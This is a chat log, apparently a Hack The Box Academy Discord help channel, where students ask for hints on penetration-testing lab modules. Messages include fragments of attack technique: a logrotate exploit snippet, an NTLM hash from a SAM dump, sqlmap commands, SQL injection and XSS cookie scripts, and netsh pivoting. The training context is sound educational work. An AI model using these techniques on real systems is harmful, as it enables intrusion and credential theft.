#modules

1 messages · Page 162 of 1

sly kelp
#

which question exactly

#

skill assessment or other

errant moss
#

Could use a hand on the logrotate module,

I run the exploit, trigger the log rotation, and then the exploit fails when it tries to validate the payload written

target = fopen(targetpath, "w");
if(target == NULL)
{
fclose(source);
printf("Shit 2!\n"); // Yeah, this line's mine, debugging...
exit(EXIT_FAILURE);
}

I guess one prerequisite for the whole thing even working is that logrotate runs as root. But if it wasn't then what's the point of the lab?! What am I missing?

fluid maple
#

I think I need some help with the Active Subdomain Enumeration.

I exported the TARGET="<ip address>" and the would run: nslookup -query=TXT $TARGET.
but, I am getting an error that the server can't find the ip address.

The weird thing I am notcing is that the error message is printing the ip address in reverse.

rustic sage
#

there i'm new to HTB. I keep getting this error when trying to run sudo /home/nibbler/personal/stuff/monitor in the Nibbler box. Been trying to finish this room up for a bit now and just can't seem to progess. I keep getting a command not found err when inputting the above command. Ic oould use some help. thaks in advance and many blessings

fluid maple
rustic sage
#

sudo /home/nibbler/personal/stuff/monitor.sh

#

changed the permissions and got in

quick magnet
#

hi i'm stuck Windows Privilege Escalation Skills Assessment - Part II question 2
already got revershell in meterpreter but its always timeout

Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value>

hasty solar
quick magnet
hasty solar
#

But I dont understand why you prefer gotta use meterpreter and no nc

quick magnet
next bronze
#

are you sure it's a kernel exploit?

quick magnet
primal mesa
#

Module: Attacking Common Applications - Skills Assessment II
Question: What is the FQDN of the third vhost?
Tried: dig axfr inlanefreight.local @IP
inlanefreight.local failed: connection refused.

Should I reset the target or am I missing something? Vhosts added to /etc/hosts

fossil crescent
#

I think say the pw brute forcing, where you must brute-force via ssh and pw is say #2135984 on the list... that's (needlessly) frustrating... yes, I know I'm exaggerating, yes, one could always use a diff word list, but, it's not you're given indication of what the pw may be.... OK, rant over.

fossil crescent
acoustic owl
south glen
#

hey guys need help with Module: password attacks , section: pass the hash question no.4

fossil crescent
# acoustic owl We are used to the fact that if we want to crack a password, rockyou.txt is the ...

Would be nice if it gave some guidance to what to try... If I'm on a real engagement, I know who customer is, where they are located, etc and can make some educated guesses. But in the ssh brute forcing, nope. Yes, it can be representatove of real life... But even then, no, at least not for me as I've never brute forced hundreds of thousands of passwords against a single ssh host against a single user like that.

plain coral
#

Creating diagrams and noting down the IP addresses and subnet details of the systems is an invaluable tip from that module. It significantly aided my understanding. you might find this video by John Hammond useful https://www.youtube.com/watch?v=pbR_BNSOaMk

https://jh.live/7a-john40 || 7ASecurity offers training and penetration tests with a free fix verification -- get 40% off training with JOHN40, $1000 off a pentest, or a enter their contest to win a completely FREE pentest! https://jh.live/7a-freepentest

00:00 - Chisel
00:23 - Setup
01:30 - Recon
05:55 - On static binaries
12:44 - Using...

▶ Play video
plain coral
fathom pendant
south glen
weary torrent
#

same result with import-module command get-GPPPassword. Did exactly like hacker13.. and it worked

fossil crescent
# plain coral Try brute forcing a different service, not ssh.

I'm going from memory, but whatever it was, I was literally doing what the module stated to do, and it was brutal. Someone else mentioned frustration, someone said nothing should be frustrating you, just challenging you, I highlight a legit frustration of mine -- if you were never frustrated, all the power to you. Yes, oftentimes usually was failure of doing something wrong (or at least not right), but I stand behind my belief that SOME portions of SOME modules are just legit frustrating, period, end of story, and we can agree to disagree.

plain coral
# fossil crescent I'm going from memory, but whatever it was, I was literally doing what the modul...

And while we might agree to disagree on the nature of this challenge, the key takeaway is that perseverance and resilience in the face of frustration are good traits in any learning process esp hacking. but it's perfectly okay to take a step back, take a deep breath, and approach the problem again with a different perspective. Keep at it and who knows... when I look back, the most frustrating bits I faced was where I learned the most.

quartz swan
#

Password Attacks Lab - Hard

Referred to forums for help, but to no avail.
I'm stuck at the very intial step where I need to bruteforce to obtain Johanna's password for SMB/RDP. I tried using Crowbar, CrackMapExec, and Hydra with both mutated and original password lists and it either takes way too long/is unable to find any password.

Any hints on what possible tools to use will be appreciated. Thank you!

plain coral
plain coral
quartz swan
#

is this normal?

plain coral
#

I can't remember but it shouldn't take 5 hours, give it another go.

fathom pendant
#

^

quartz swan
#

🫡 I will try again, thank you

plain coral
#

Prepare yourself the BitLocker part might take 5 hours though kek

umbral wasp
#

can you please help in sam "ssh" I have logged into ssh but could not find flag

fathom pendant
#

that's all i can say lol

modern kayak
#

Hello! everyone Excuse me I have a problem, when I try to use gobuster to complete the task with this command:
gobuster dir -u http:\94.237.57.142:58207\ -w /usr/share/wordlists/dirb/common.txt
I recive this error message , Error: required flag(s) "wordlist" not set

fathom pendant
#

it really won't, there's plenty of links in this chat regarding mounting bitlocker to linux

#

¯_(ツ)_/¯

modern kayak
fathom pendant
#

yes

modern kayak
fathom pendant
#

this one you can almost completely follow braindead

#

first time I did it i mounted to host; but second time I decided to try mounting in vm

#

your notes contain spoiler

#

as long as it works for you

modern kayak
fathom pendant
#

¯_(ツ)_/¯

modern kayak
modern kayak
fathom pendant
#

then your gobuster command is wrong

#

¯_(ツ)_/¯

modern kayak
#

Hahaha

#

The ironic it is the same command in the page, well Tnx i gonna check

modern kayak
#

Update: the command not work if we use tmux... hahaha lol

steady dust
#

Hello, I made a tunnel with netsh (10.129.63.134 1515 172.16.6.50 3389), but when I try to connect with xfreerdp i receive some errors [06:31:02:039] [33607:33608] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014], [06:31:02:039] [33607:33608] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail, [06:31:02:039] [33607:33608] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1, and I can't understand why.

#

xfreerdp /v:10.129.63.134:1515 /u:user /p:password /cert:ignore

fathom pendant
#

you should be trying to rdp directly to the next target

#

that's why

steady dust
#

I want to RDP to host B trough Host A. I created a tunnel with netsh on host A... but it's not working.

fathom pendant
#

...

#

Doing the pivoting module yeah?

#

Just Follow the steps exactly

steady dust
#

Not pivotant, but AD skill assessment and i dont't understand why it is working.

#

It's not working*

severe eagle
#

Hey I am having the same issue did you work it out I have no idea I have the sam and system files still wrong hash???

fathom pendant
rare swan
#

Module:Attack Web Apps Section:Attacking Thick Client Applications --- actually found two files having the magic bytes MZ in it --- but both arent .net applications so i cant reconstruct code with de4dot --- any hint?

steady dust
severe eagle
#

Yeah so i used the rectic with the backup password

#

copied the hash to attack machine

#

dumped with secrets dump

#

and hash is wrong

#

Administrator:500:aad3b435b51404eeaad3b435b51404ee:20ff7845bfb62119d751d9b910547236:::

#

thats the hash i get but no matter how i attempt it for answer always wrong

#

500 is local aswell

#

so i dont understand??

elfin cedar
#

Try different format

fathom pendant
#

^

#

Ntlmv2

#

Btw

severe eagle
#

what you mean different format

#

how can I change the format of the hash

elfin cedar
#

I think it asks for a part of the hash

#

I'm not sure how to phrase it

severe eagle
#

yeah i tried that as well

elfin cedar
#

Marcie

severe eagle
#

tried the end hash

#

tried both hashes

#

tried the whole line hahaha

#

i used samdump2 for it as well gave different hash tried them as well all the same was wrong

fathom pendant
#

Look up ntlmv2 hashes

#

It's stored as LM:NT (which btw hashcat cracks LM first, then permutates that for NT)

severe eagle
#

im confused though it says to get the files which would be sam and system can i get the ntlmv2 hash from sam and system

rare swan
#

Module:Attack Web Apps Section:Attacking Thick Client Applications --- actually found two files having the magic bytes MZ in it --- but both arent .net applications so i cant reconstruct code with de4dot --- any hint?

severe eagle
#

any links to help I tried to drop mimikatz on machine to get it but gets removed by av Im guessing

fathom pendant
#

Most of the labs have av disabled

#

You can also see if it's in c:\tools

#

¯_(ツ)_/¯

severe eagle
#

yeah already checked no tools on this machine

fathom pendant
#

Then get a precompiled version and transfer it over

#

¯_(ツ)_/¯

severe eagle
#

yeah i tried that as well

gusty granite
#

hey same problem here. any tips if Im doing something wrong? got 4 flags and the flag for 3rd question is the one with text 'flagfour' in it and now cant find anything else

severe eagle
#

yeah i think its issue on the machines

gusty granite
fathom pendant
#

Oh sorry didn't realize you meant something else

gusty granite
#

can I dm you if you have solved this?

severe eagle
#

sorry just realised different convo

fathom pendant
#

After getting the proper vhosts

gusty granite
fathom pendant
#

Then you missed a host

gusty granite
cedar void
#

Who is getting this error:

feral lichen
#

me too

fathom pendant
#

Like I said , I don't recall

fathom pendant
severe eagle
#

yeah mimikatz wont copy accross

gusty granite
#

please tag me or DM if anyone can help me with finding the last flag on Virtual Hosts in Information Gathering module. want to make sure Im doing everything correctly. I dont think Ive missed anything but maybe I have

fathom pendant
feral lichen
#

I really got blocked for 15m

slender shoal
fathom pendant
#

^

severe eagle
#

Yeah if anyone can help with my module flick me DM if you can just found out not suppose to DM people but Im easy I have got this far in module for Windows Priv esc so anyone stuck on anything DM me can help best I can

feral lichen
#

it only appears when I go to the exams tab

slender shoal
compact patrolBOT
quartz swan
cedar void
#

Is this message always supposed to be here? I had to switch the vpn location for the Pawnbox and I wasn't sure if that message was always there? I asked because I am have been having trouble rdp'ing into a remote target IP and I was wondering if that is the issue(

steady dust
#

netsh drives me crazy

acoustic owl
steady dust
#

wait, i can't add images 🙂

#

Address Port Address Port


10.129.119.249 1562 172.16.6.50 3389

acoustic owl
steady dust
#

/v:10.129.119.249:1562 /u:xxxx /p:xxxx /cert:ignore

#

but it's not working

#

and i don't understand hy

#

why*

acoustic owl
steady dust
#

It's open.

acoustic owl
#

What is the machine 172.16.6.100?
Does machine 10.129.119.249 have direct access to machine 172.16.6.50?

steady dust
#

Host A (10.129.119.249, 172.16.5.100), Host B (172.16.6.50). I created a tunel with netsh on Host A, but i don't understand why I can't RDP to Host B.

acoustic owl
rustic sage
#

anyone willing to help me with the nibbles room? got it mostly figured out just need a little guidance

dark beacon
#

Hi there, I am stuck in TNS section of the Footprinting module. I cannot find any hash password. Could someone please help me? 🙂

misty current
#

A nudge for you, try using chromium browser instead of firefox to analyze the requests this particular section.

echo widget
#

Hi guys,
I'm stuck on the skills assessment , ADVANCED SQL INJECTIONS. Could someone please help me? 🥲

misty current
#

I just booted pwnbox and looked into it and realized firefox was not executing the javascript from the target application for some reason.

granite pagoda
#

Hi,

I'm stuck in ACL Enumeration module but it's more with platform issue ! The RDP are just really unstable (crash often or I type a letter, it came like 6 seconds after). I really cannot answer the question because of that...

I tried the Pwnmachine and my own VM, same thing...

If you have any idea I take !

Thanks !

misty current
#

Not sure if it was working on your firefox, but pretty sure you would have realized quicker the POST request being made if the javascript worked.

sly kelp
#

Finally I figured out Thick client application part. Man I wanna cry 😭😭

civic terrace
#

Credentialed Enumeration - from Windows - Anyone else run into an 'incorrect' username/password when attempting to rdp onto the foothold with the provided creds?

fluid maple
#

Is anyone able nslookup 10.10.34.136 ? I keep getting a ***server cant find 10.10.34.136 error. I'm trying to find the FQDN of that ip address. Is that even the correct approach?

civic terrace
# slender shoal Use single quotes.

Correct, it has a special character, so i've used single quotes, no dice. Also reset a few times, and manually typed it on the rdp session and manually typed, copy and pasted, and did a comparison on show to make sure there were no typos.

slender shoal
#

I'd have to open the lab again. I don't know right now. usually that is the issue or just wrong username/password.

rustic sage
#

Wish these boxes were more responsive

acoustic owl
fluid maple
acoustic owl
acoustic owl
fluid maple
fluid maple
acoustic owl
#

No, the IP is from your target

#

The module always uses example IPs

civic terrace
slender shoal
#

let me boot it up. One moment.

#

Also try to reset

fluid maple
civic terrace
slender shoal
#

can i see your command?

fluid maple
acoustic owl
civic terrace
slender shoal
#

Hmm..

#

Give me a few minutes, i'm going to wait to see if it changes with a few minutes of waiting.

acoustic owl
#

You are trying to do a reverse DNS query, which does not work.
Logically, your DNS resolver does not know this IP.
You have to do everything in the lab. Public DNS resolvers cannot help you

slender shoal
#

Yeah its fine for me. your timer says 115 minutes or less right? @civic terrace

civic terrace
#

this one is 111

slender shoal
#

Does it still show logon failed?

civic terrace
#

I'll try again here in a couple min. started a full update just in case

fluid maple
flint laurel
#

I need help with crackmapexec skills assessment Q3 please if anyone can give a nudge.

acoustic owl
fluid maple
acoustic owl
civic terrace
# slender shoal Does it still show logon failed?

typing this out in case anyone else runs into and searches on discord. Working now with xfreerdp, but same error with rdesktop. Not going to TS rdesktop, just gonna keep pushing with the course on xfreerdp.

steady dust
rustic sage
#

I've done everything to a T in the nibbles room and still no reverse shell to get the root flag. I've been at it for 3 days and its infuriating. I've tried multiple connections. I really like the content of HTB but the machines are so slow and unresponsive its making me second guess a sub. Any help would be appreciated,

fluid maple
cedar void
#

I continue to with this exercise over and over again. The HTB tech people said I should try the powershell command prompt(instead of cmd listed in the example. ) I tried that a few times and I could not generate an answer. someone suggested that I go back to the command prompt(as used in the module) and I tried that. When I run 'regsvr32.exe SocksOverRDP-Plugin.dll' in command prompt I get an error. But when I run the same command in 'Powershell prompt' It runs as is expected. https://academy.hackthebox.com/module/158/section/1439

fathom pendant
cedar void
#

Oh I forgot that

rustic sage
#

Can some just confirm that my messages are being seen

#

Thank you

fathom pendant
rustic sage
#

yes

#

the server keeps going down

fathom pendant
#

and the rev shell is your tun0 ip yeah?

rustic sage
#

yes

#

just tried again from the beginning and my browser wont connect to the vuln machine. Says server unresponsive

fathom pendant
#

restart the target

#

and make sure your vpn connection is still running

rustic sage
#

I've done that. 3x already

ember fog
#

Hello can anybody help my whith a eror i am getting in metasploit ?
i am new in this domain so i cant realy fiugure it out by myself

acoustic owl
ember fog
#

Msf::OptionsValidateEror The following opions failed to validate : INFILENAME i get this eror after i set thee INFILENAME and i use exploit

fathom pendant
#

don't think there's an option called INFILENAME

#

usually it's FILENAME

#

or FILEPATH

#

but as Payload said: if you tell us what module you're doing we can help better

ember fog
#

ca we talk in private ? so i can explain you better the problem ?

fathom pendant
#

no

#

because you still haven't said the module

#

so I can't help you further, especially if it's one I haven't done yet

ember fog
#

thee module is ; windows/fileformat/adobe_pdf_embedded_exe

fathom pendant
#

... we mean the Academy module my guy

ember fog
#

i dont realy know what is that

fathom pendant
ember fog
#

thanks

fathom pendant
#

in future this channel is for help with academy content, not random shit you're trying to do

ember fog
#

okk

rustic sage
#

Are all boxes as unresponsive as nibbles?

fathom pendant
#

no

#

it seems like you're just having some issues with this one

rustic sage
#

trying to get those rank points eh?

fathom pendant
#

?

fathom pendant
fringe crystal
#

Guys, has anyone completed the hard lab of PASSWORD ATTACKS ?

#

I don't know if it's my fault, but seems as nothing is working ...

#

I have been stuck here for 3 days now. I know I am using the right commands, but I get error after error

#

Tag Me if you can help somehow, and eventually, thanks in advance

acoustic owl
fringe crystal
#

session setup failed: NT_STATUS_LOGON_FAILURE

grizzled robin
#

Hi :D

fringe crystal
#

also, I cannot extract the correct hash from the Logins.kdbx file. I mean, I extract one hash, but when I try to crack it, both with John and hashcat, I get errors (on both Kali and pwnbox)

acoustic owl
fluid basin
#

In the Information gathering module-Web Edition, it goes over briefly a combination of nslookup and WHOIS to determine if the target is using host providers. I wanted to ask why that is important information to know since wouldn't the host providers be out of scope without third party approval?

fathom pendant
fluid basin
hazy grotto
#

Can i DM someone for help on Windows Privilege Escalation Skills Assessment - Part I ?

flint laurel
#

Can i DM someone for help on Using Crackmapexec Skills Assessment

crimson walrus
#

Hey guys, can anyone suggest an alternative for joomla-brute.py for joomla login bruteforcing?

#

the nmap script does not seem to work for me and neither does the metasploit module (I may be doing something wrong of course) so I'd be grateful for any tips

undone narwhal
supple gorge
#

Splunk module:
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an analytics-driven SPL search against all data the source process images that are creating an unusually high number of threads in other processes. Enter the outlier process name as your answer where the number of injected threads is greater than two standard deviations above the average. Answer format: _.exe

What does it mean by "process image that are creating an unusually high number of threads"

Is is talking about processes, dll or something else? I need a pointer

I got it, it has to do with id 8

fluid maple
#

I could use some help with a question in the Active Subdomain Enumeration module. I'm not sure if my approach is right or if I have the right syntax.

The question is: "Which IP address is assigned to the "ns.inlanefreight.htb" subdomain? Submit the IP address as the answer.

Target machine ip: 10.129.161.101
Subdomain: ns.inlanefreight.htb
Command(s): nslookup $TARGET ns.inlanefreight.htb, dig $TARGET ns.inlanefreighthtb

The nslookup error says "couldn't get address for ns.inlanefreight.htb"
The dig error just displays server and random information about the server.

Does anyone have an idea how to move forward?

rustic sage
#

try iplookup on google?

#

or using whatweb? or gobuster?

languid galleon
#

I just looked at my questions for that module to help and mine says us.inlanefreight.htb not ns.inlanefreight.htb ... not sure if we get slight modifications to questions depending on region tho

rustic sage
#

can anyone help me with the nibbler box? im nearly at the end and keep getting an error. plz help

fluid maple
fluid maple
rustic sage
lusty thicket
south folio
#

Hy,
In the module [MaOS foundamentals] - Where are the Applications related to the system stored at? I need to find the answer to the question.

Someone can help me?

rustic sage
latent glen
#

Wow the Module: Password attacks' Hard Skills Assessment was the most fun I have had since starting Academy. That was absolutely brilliant. Loved it! Well done HTB

quartz swan
royal sigil
#

hello i make the module file uplaod type fylter i have succeful upload but i have cannot be displayed bcause it contains error .any hint

lusty thicket
lusty thicket
royal sigil
#

ok

quartz swan
royal sigil
#

i have find

lusty thicket
royal sigil
#

i have tried things harder is the easer is work

placid edge
#

Anyone done the medium footprinting lab exercise?

#

Stuck on the last part

analog dock
#

What are you stuck on exactly and what have you tried

placid edge
#

The mssql queries

#

Just cant seem to get it

#

Like how am i supposed to find that hidden user in that database file

#

Would love a hint

analog dock
#

Check the databases

naive wadi
#

Having an issue with the questions in web proxies skill assessment. "Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload) "

#

Just to be clear I have taken the suggested wordlist, re-encoded in the reverse order and ||appended it to the existing cookie||, is that right?

#

got it by doing prefix encoding too

#

Okay so have done all of web proxies skills apart from the first question. The /lucky.php page has a button that appears to be disabled. Try to enable the button, and then click it to get the flag.

#

I modified the ||disabled|| tag to read ||enabled|| but that doesn't seem to work

fathom pendant
naive wadi
#

cheers

#

I hate that

fathom pendant
#

@torpid copper please ask permission before dming per the #rules

torpid copper
#

why my sqlmap doesnt work? Module:sqlmap Section:Running SQLMap on an HTTP Request Question 3
sqlmap http://94.237.55.96:45268/case4.php --data='{id:1*}' --batch --level 5 --risk 3 --random-agent --dbs --random-agent

#

--dump?

#

i dont know can you tell me? @wary plover

torpid copper
#

same it doesnt work

#

@wary plover

fathom pendant
#

--data is passing the http request info through

#

like when you do --data in a curl request

torpid copper
acoustic owl
#

What exactly is not working?
Do you receive an error message?

undone narwhal
torpid copper
#

how to send ss to this server?

undone narwhal
fathom pendant
acoustic owl
torpid copper
#

sqlmap -r Desktop/req.txt --batch --dbs

acoustic owl
#

What is in the req.txt file?

torpid copper
# acoustic owl What is in the req.txt file?
POST /case4.php HTTP/1.1
Host: 94.237.54.197:41838
Content-Length: 8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://94.237.54.197:41838
Referer: http://94.237.54.197:41838/case4.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

{"id":*}
acoustic owl
torpid copper
patent whale
#

Hi there! I need a help with the Attacking GitLab module. I found 7 usernames so far and none was accepted by the HTB portal as the correct answer. I was even able to use 1 to get the RCE and got the final flag...

quartz swan
fathom pendant
#

if you try and use it and it requires a pw

quartz swan
ashen zephyr
#

Anyone at Intro to Whitebox Pentesting SkillAssessment that could give me a hand? I'm stuck at the second exercise where I get "code injection should not be possible, even without sanitization or validation" even after removing || the "new function" part and changing it with a standard "console.log" ||. I tested the code locally to make sure it doesn't crash so I don't see what is causing the check to fail.

proven panther
#

I'm on the 'getting started' module, i've just completed the web enumerating section and was working through the initial foothold section when my i stopped being able to access the web server and pinging the IP gives ' destination host unreachable'. I've reset the VPN multiple times, changing it from UDP to TCP and changing the server that it's on but nothing works. Any ideas?

plain coral
#

If the request should be a POST request, you need to specify --method POST. If it’s not specified sqlmap assumes it’s a GET request.

plain coral
hearty light
#

(Sorry if this is not the place for these questions)
So, I'm at the final chapter of the getting Started module, where I have to hack a box without a walkthrough.
I have managed to use metasploit to get a shell, but I'm logged in as www-data, instead of a normal user, like in previous examples.
Can I get some hint on how to escalate privilege? Or did I do smth wrong along the way?

fathom pendant
#

www-data is the web user

hearty light
#

I know that

#

It doesn't seem to have many perms, so I don't know where to go from here

fathom pendant
#

it's still a "normal" user :P just do stuff that you've done previously in this module

#

check what stuff he does have access to

#

does sudo -l tell you anything

hearty light
#

it can use ||/usr/bin/php||

fathom pendant
hearty light
#

well, vm time is over, will give it another shot tomorrow

fathom pendant
#

¯_(ツ)_/¯

hearty light
#

I don't have enough ram for a vm :p

echo widget
#

Has anyone already done the "ADVANCED SQL INJECTIONS " module and could give me a hand?

hearty light
rustic sage
#

Hello, as you know, some modules on HTB Academy require VPN connection. I can't get any efficient connection from the modules that require VPN. When you turn VPN off and on, it comes on for 5 seconds and then goes away again. Is there anyone who has a problem with VPN like me and fixed it?

fathom pendant
rustic sage
fathom pendant
#

sudo killall openvpn

rustic sage
#

ty

woven copper
echo widget
woven copper
#

did you modify the python exploit that they give us o are you trying manually ?

echo widget
echo widget
#

I've modified some queries to make them applicable to the assessment, but I haven't managed to adapt the one I quoted above ...

steady dust
#

Hello, it is possible to use evil-winrm or impacket-psexec with netsh?

unique palm
#

I am stuck on the DNS module in Attacking Common services. Anyone solved it and can walk me through?

fathom pendant
#

follow the instructions in the section iirc you need to use the tool suggested

wheat scroll
#

Hello, can you help me please. I’m doing File Upload Attacks module and when I upload phpbash.php which and I visit Server_IP:Port/uploads/phpbash.php the interface appears but I can’t write on it.

#

It’s like a picture I can’t controle it

dreamy solar
#

Hello guys can you help me please, I send a XSS stored but I don't receive the cookie, why ? where should it be displayed?

grand marsh
#

then i dont understand the point

lusty thicket
lusty thicket
wheat scroll
delicate heath
#

Can someone help me with the information gathering module --active subdomain enuneration

#

I am lost at how to get the txt record (part 3)

lusty thicket
lusty thicket
delicate heath
#

I have completed the zone transfer and got all the other records but I can't find a txt record anywhere

spiral pelican
#

HI all ! Anyone had finish the kerberos attacks module and can help me with the SA part ? 🙂

fathom pendant
delicate heath
#

@lusty thicket the hint is that one of the zones will have a txt record but the only zones I got are root.inlanfreight, and inlanefright

fathom pendant
#

There's more

#

Subdomains exist

#

You limited yourself to what you assumed to be the zones

delicate heath
#

but the zone transfer not give any txt recrods

fathom pendant
#

Because it exists on a different subdomain

#

A couple of those entries seem interesting

#

But I guess if you don't know much about networking, you won't see it right away

delicate heath
#

I think my issue also stemmed from assuming my zone transfer would return all records not just the A record

grand marsh
# lusty thicket go through the section again

I did. The lessons on both GET and POST invite the student to try out the fetch request feature in devtools, except there's no request to "copy as fetch" since as I said already the browser doesn't make any usable request

delicate heath
#

@fathom pendant Thank you! I got it!

dreamy solar
lusty thicket
dreamy solar
#

<script>
document.body.innerHTML = document.cookie;
</script>

#

with this it is okay

#

can be added in hint of the section

unique palm
#

why on earth does htb provide a password list for the attacking common services section when the password can only be found in the rockyou and not in the provided list .... This cost me serveral hours today fingerguns

steady dust
#

Program 'chisel.exe' failed to run: The specified executable is not a valid application for this OS platform.At line:1
char:1

#

Some ideas? 😄

crystal gyro
#

I have this flag Apache Tomcat/9.0.31 (Ubuntu) but is not working I try different formats, in Module GetStarted section 7, for the question: Perform a Nmap scan of the target. What is the version of the service from the Nmap scan running on port 8080? Can be wrong HBT?

#

I try 9.0.31 and Apache Tomcat 9.0.31 etc..

steady dust
crystal gyro
#

wow thanks. I try different things and not this one xD

rustic sage
#

how do you guyz revise?

upper echo
#

I know this is a few days old, but for further clarity and anyone else who has the same question, The DNS server responded and gave you 127.0.0.1 (from its perspective). One way of thinking about this is if you asked someone "Who can me give the address for bob" and they replied "me", You then can ask them for the address not yourself

fathom pendant
#

Threatening someone else goes outside ethical hacking

analog fern
fathom pendant
#

And is not related at all to this server

fathom pendant
steady dust
#

Do you know if there is any problem with htb infra?

fathom pendant
#

Occasionally there's a 502 error

zealous oyster
#

Does anyone keep on getting their RDP connections dropping every 90 seconds and then it takes 5 mins to reconnect before the same thing happens?

slender shoal
compact patrolBOT
white ore
#

Hello, did you encounter any issues, after sending the URL, i don't receive anything, but my test 10.10.x.x:42060 [302]: GET /?username=test&password=test&submit=Login works fine, i Use my own VM

proud lantern
#

Hey guys,

#

im having some problems with the Windows Fundamentals course, im trying to mount using this command after escalating priveledges, but for some reason im getting an error.

#

sudo mount -t cifs -o username=htb-student,password=Academy_WinFun! //Targetip/"Wiggydocs" home/htb-student/Desktop/
Couldn't chdir to home/ws01/htb-student/Desktop/: No such file or directory

#

anyone have any ideas?

unique palm
#

seems like a infra issue... Using PWNBOX and cant get a consistent ARP ping to targets. RDP Sessions also died randomly

proud lantern
#

yeah it just died on me too, i ended up disabling the firewall and i got disconnected after a couple of minutes.

#

thanks for that.

hazy grotto
#

So are people having issues with HTB academy? I can't seem to ssh in

frosty jewel
#

In SQL Injection Fundamentals > Subverting Query Logic > Authentication Bypass; It's asking for bypassing the login form as user 'tom'.
I've tried injecting SQL queries but I always end up logging in as 'admin'. I tried [Hints] which is asking me to look at the cheat sheet which didn't help me.
Now, in this executing query, we simply cannot do something like WHERE username != 'admin', so how should I approach this problem?
Executing query: SELECT * FROM logins WHERE username='' AND password = '';

white ore
kind turret
thorn urchin
unique palm
#

Im working on the skill assesment - hard on attacking common services.

I managed to impersonate John on the mssql and found the linked server. However, I have trouble to lateral move further is there something wrong with my query since i dont see a admin acc?

||SQL> EXECUTE('SELECT DISTINCT b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = ''IMPERSONATE''') AT [LOCAL.TEST.LINKED.SRV]
name

john

simon ||

white ore
kind turret
thorn urchin
#

It was a joke because Ive never seen you before

#

but youre a mod and evidently with the academy team lol

frosty jewel
frosty jewel
#

Nevermind, I got the flag fingerguns

#

I don't know why adding comments after the username worked though, gonna go look at it now

orchid pine
#

can someone explian why i cant see the conatiner listed in the ps cmnd

empty cairn
#

Lol, does the default banner of SSH include version and specifically hostname and domain?

#

In Linux I mean

white ore
supple gorge
#

Anyone know if parrotbox has rockyou in it?

Edit: yes it does

orchid pine
#

what is worng with the targets

empty cairn
hazy grotto
#

Finally completed pentest path. -not the exam

grim nimbus
#

guys, hope you don't mind a noob question

#

But for a newbie in cybersec, which should I go first CBBH or CPTS? As in which is more digestible for a noob like me. I have basic in IT, but none in cybersec

#

I have read a few times that they have overlapping knowledge

quasi jungle
#

It has tor for some reason but not firefox

lusty thicket
quasi jungle
next bronze
quick cloud
#

RDP is showing black screen. Anybody know how to fix this?

autumn pilot
#

Press ESC/Enter/Space and etc

gray merlin
fathom pendant
#

use the other mentioned keys

gray merlin
#

It was a joke.

#

Not a very good one.

fathom pendant
#

eh a pretty overused one

gray merlin
#

The only types of jokes I know.

fathom pendant
#

and my reply was more sarcastic than serious

autumn pilot
#

B- for effort

gray merlin
#

Best grade I ever got. 😅

fathom pendant
#

:^)

empty cairn
#

El dinoman001

#

He's my neighbor's cousin

#

Whass up homie

prime inlet
prime inlet
#

so asked

fathom pendant
#

this isn't a gen chat; you can find out how to unlock more of the server by reading #welcome

empty cairn
#

yeah amigo read the rules

empty cairn
#

general chat

#

xd

prime inlet
acoustic owl
prime inlet
#

oh payload ik that =D

fathom pendant
prime inlet
#

where is the general chat?

fathom pendant
gentle grail
#

@lucas_phosphate

umbral wasp
#

I am unable to login into kira account in ssh please help me

autumn palm
#

@umbral wasp don't worry it's another typically HTB horribly constructed challenge with a large lack of information

#

Bruteforce the password using the hashcat mutations rule on "LoveYou"

fathom pendant
#

The one thing about that module is patience (and attacking other ports than ssh)

autumn palm
#

What I dislike about the module is the fact that I have to guess which magic wordlist to use for the specific challenge instead of just picking a damn password from rockyou.txt like any other CTF-challenge / lesson instead of having to make a number of mutated wordlists..

fathom pendant
#

Except, generally, after you make the mutated wordlist - that's the one you use

#

kira's password is in-fact in that list

#

The module is meant to simulate that you've gathered some info regarding passwords and have some rule list that you pass it through

#

Often the modules do have you use the provided wordlist(s) in their resources in some fashion

#

My complaint is that the list ends up extremely long: but it's still dwarfed by rockyou

autumn palm
#

Well you make a fair point. I actually choose to make a completely new wordlist containing only combinations of loveyou and completely missed the fact that LoveYou is also in the original mutated wordlist. I bite my words.

fathom pendant
#

Yeah the hint is more to speedtrack you to get it, but I think it's still like 5-10 minutes using the original mutated list

slate gate
#

fuck kira tbh kek

sly kelp
autumn palm
#

another time-wasting task having to deal with opening the damn document after cracking the password.

quasi jungle
dire abyss
#

good morning everyone.. on active subdomain enumeration, zonetransfers section. im not sure what im doing wrong on nslookup. the command "nslookup -type=NS inlanefreight.htb" doesnt work, so i try interactive mode and set the server to my target IP 10.129.128.170 and then try looking for the NS record through interactive mode which still doesnt give me results, says REFUSED. however if I do "dig ns inlanefreight.htb @10.129.128.170" that does give me the record. Is my nslookup broken or am I missing something with that tool?

quasi jungle
acoustic owl
#

You must also specify a name server with nslookup, as .htb is not an official TLD.

dire abyss
#

well the first objective is to find the name server

#

i know it but i want to complete this lab with nslookup not dig

acoustic owl
#

What is the question

dire abyss
#

Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer.

autumn palm
#

Is there an **actual **working **attack ****box **solution to mounting the .VHD for the password attack lab hard? Doesn't appear so

dire abyss
acoustic owl
dire abyss
#

and using 1.1.1.1 as my server doesnt work either

acoustic owl
#

Right, because .htb is not an official TLD

dire abyss
#

seems i over thought that

#

when run nmap on the target IP i do see port 53 open

acoustic owl
dire abyss
#

perhaps theres a script i can run to grab the FQDN?

autumn palm
acoustic owl
acoustic owl
autumn palm
#
